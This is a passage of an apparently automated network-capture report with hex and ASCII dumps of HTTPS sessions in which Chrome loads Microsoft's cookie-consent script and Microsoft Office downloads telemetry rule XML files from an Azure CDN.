                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-24 12:39:48 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:48 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                              Age: 20054
                                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                              x-ms-request-id: bc63358d-901e-007b-6c3f-3e6fdd000000
                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                              x-azure-ref: 20241124T123948Z-178bfbc474bbcwv4hC1NYCypys00000005ug0000000062da
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:48 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                              Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                              2024-11-24 12:39:48 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                              Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                              Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                              2024-11-24 12:39:48 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                              Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              92192.168.2.64982013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:48 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:49 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1952
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                              x-ms-request-id: abed2815-c01e-0046-0275-3d2db9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123949Z-15b8b599d88f9wfchC1TEBm2kc00000004k0000000008zqb
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:49 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              93192.168.2.64982113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:49 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:49 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 958
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                              x-ms-request-id: a3dd353e-a01e-0032-2c4e-3c1949000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123949Z-178bfbc474bpnd5vhC1NYC4vr40000000620000000001m9k
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:49 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              94192.168.2.64982213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:49 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:49 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 501
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                              ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                              x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123949Z-178bfbc474b7cbwqhC1NYC8z4n00000005w000000000780h
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:49 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              95192.168.2.64982313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:49 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:49 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2592
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                              x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123949Z-174c587ffdfp4vpjhC1TEBybqw00000004e000000000a59y
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:49 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              96192.168.2.64982413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:49 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:50 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 3342
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                              ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                              x-ms-request-id: 8b201486-c01e-008d-1417-3e2eec000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123950Z-178bfbc474bscnbchC1NYCe7eg0000000640000000006bpe
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:50 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              97192.168.2.64982613.107.246.634434364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:50 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-24 12:39:51 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:51 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                              Age: 20057
                                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                              x-ms-request-id: bc63358d-901e-007b-6c3f-3e6fdd000000
                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                              x-azure-ref: 20241124T123950Z-178bfbc474bbbqrhhC1NYCvw74000000061g00000000b6rg
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:51 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                              2024-11-24 12:39:51 UTC713INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
